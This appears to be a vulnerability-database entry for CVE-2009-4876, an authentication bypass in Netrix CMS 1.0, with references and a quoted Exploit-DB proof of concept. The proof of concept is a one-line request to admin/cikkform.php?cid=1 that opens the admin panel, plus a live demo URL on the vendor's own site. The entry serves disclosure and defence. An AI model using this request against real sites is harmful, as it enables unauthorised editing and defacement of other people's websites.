CVE-2009-4876
medium
CVSS v3
โ
CVSS v4 NEW
โ
VIR risk
6.0
Description
admin/cikkform.php in Netrix CMS 1.0 allows remote attackers to modify arbitrary pages via a direct request using the cid parameter.
Predictions
Exploit likelihood
20%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Netrix CMS 1.0 - Authentication Bypass
=======================================================
+++++++++++++++++++ information +++++++++++++++++++++++
=======================================================
[+] Script :Netrix CMS 1.0 (Auth Bypass) Remote SQL Injection Vulnerability
[+] Found by : Mr.tro0oqy
[+] Script site : www.netrix.hu
[+] C0ntact : t.4@windowslive.com <Yemeni ana>
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
Exploit :
---------
http://www.site.com/path/admin/cikkform.php?cid=1
---------
u in control panel
control panel :
-------------
http://www.site.com/path/admin
-------------
Demo live :
-----------
http://cms.netrix.hu/admin/cikkform.php?cid=1
-----------
u can edit anything or put on your index ;)
# milw0rm.com [2009-07-20]Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| netrix | netrix_cms | 1.0 | |
References
- http://osvdb.org/56008
- http://secunia.com/advisories/35891
- http://www.exploit-db.com/exploits/9203
- https://exchange.xforce.ibmcloud.com/vulnerabilities/51846
- http://osvdb.org/56008
- http://secunia.com/advisories/35891
- http://www.exploit-db.com/exploits/9203
- https://exchange.xforce.ibmcloud.com/vulnerabilities/51846
CWEs
CWE-264
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.